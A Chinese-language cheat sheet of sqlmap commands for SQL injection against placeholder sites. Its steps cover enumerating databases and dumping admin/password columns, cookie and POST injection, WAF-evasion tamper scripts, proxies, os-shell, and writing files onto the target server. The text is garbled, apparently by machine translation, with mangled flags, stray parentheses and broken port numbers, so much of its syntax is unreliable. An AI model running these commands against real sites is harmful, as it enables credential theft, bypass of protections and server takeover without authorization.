Sqlmap常规命令:
访问(数据库) :
SQL map-u“http://www.XXX.com/show news.ASP? id=1(-tables (获取表) ) ) ) )。
SQL map-u“http://www.XXX.com/show news.ASP? id=1”--columns-t表(获取指定表字段的内容) ) ) ) )。
SQL map-u“http://www.XXX.com/show news.ASP? id=1(-dump-c“管理员,密码”-t表(指定数据下载) ) ) )。
MYSQL (多个数据库) :
SQL map-u“http://www.XXX.com/show news.PHP? id=1- DBS (数据库获取) ) ) ) ) )
SQL map-u“http://www.XXX.com/show news.ASP? id=1(-current-db (获取当前网站的数据库) ) ) ) ) ) )。
SQL map-u“http://www.XXX.com/show news.ASP? id=1” - -tables -D数据库(获取指定的数据库表) ) ) ) ) )。
SQL map-u“http://www.XXX.com/show news.ASP? id=1(- columns-t“表”-D“库”(获取指定字段的内容) ) ) ) ) ) )。
SQL map-u“http://www.XXX.com/show news.ASP? id=1”-dump-c“admin,password” -T“表”- d“库”(下载指定数据) ) ) )。
饼干注入: sqlmap-u“http://www.XXX.com/show news.ASP? ”cookie“id=1”-第2级
开机自检注入:
包括两个方面。 -r参数注入- data参数注入
根据情况选择两者的区别
- r :用burp抓住包,作为1.txt保存在sqlmap根目录中,一般多使用登录框
Sqlmap.py -r “1.txt”
data :可以直接使用参数
SQL map-u“http://www.XXX.com/show news.ASP? ”data=“id=1”
静态注入:
在有注入的地方加上*,获取数据库
sqlmap.py-u“http://www.xx.com/index.PHP/index/view/id/40 *.html”- DBS
Sqlmap代理:
http(s )代理:
参数:-proxy,-proxy-cred,-proxy-file,-ignore-proxy
使用参数“-proxy”设置格式为http(s ) ://URL :端口的http (代理)。 如果代理需要认证,请使用-proxy-cred参数提供认证证书。 格式为“username:password”。
例如:
SQL map-u“http://www.XXX.com/show news.ASP? id=1”- DBS- proxy http://192.168.0.133601080
代理文件:加载代理ip列表
例如,sqlmap.py-u“http://www.XXX.com/show news.ASP? id=1 -proxy-file=dl.txt (代理ip文件) )。
ignore-proxy :忽略本地代理设置
proxy http://local :8080thread S10 (可定制线程加速)代理
因为没有尝试过Tor代理模式:所以不贴语法。
Sqlmap的tamper通过waf脚本进行了组织:
sqlmap有两个选项:-check-waf -identify-waf以识别waf
注:自己常用的脚本
space2morehash.py space2hash.py (过滤‘=’省略;base64encode.py;用base64编码替换) ) ) ) ) ) )。
charencode.pyspace2comment.pycharunicodeencode.py (字符串unicode代码) chardoubleencode.py (双url代码) unmagicquotes.py 拆分) appendnullbyte.py )在有效载荷结束位置加载零字节字符编码) ) ) ) ) ) )。
Tamper语法:
batch :要求不写入目标(有任何提示时默认返回托架) )。
tamper :使用干预脚本
-v3(3为等级) ) ) )。
注:如果不使用级别3,则无法进行下一个操作。
语法: sqlmap.py-u“http://www.XXX.com/show news.ASP? id=1”- v3- DBS- batch- tamper“space2morehash.py”
注:数据库的tamper脚本(如mysql access )仍然不同
带上与大人物整理的各数据库相对应的tamper脚本链接
3359 blog.csdn.net/hx sstar/article/details/22782627
Sqlmap请求延迟:
sqlmap.py-u“http://www.XXX.com/show news.ASP? id=1”- tables- delay 0.5 (延迟时间) ) ) ) ) ) ) )。
如果您具有网站dba权限并可以读取写入文件,则可以直接使用OS-shell或以下命令
读取文件读取/主页/www/index.PHP指定文件
文件-写入写入本地文件。 ---文件-写入“c :test1.txt”- -文件- dest“/home/www/feizhu.txt”本地1.txt
sqlmap连接数据库:
sqlmap.py-dmysql ://test : test @ localhost 33603306/testSQL-shell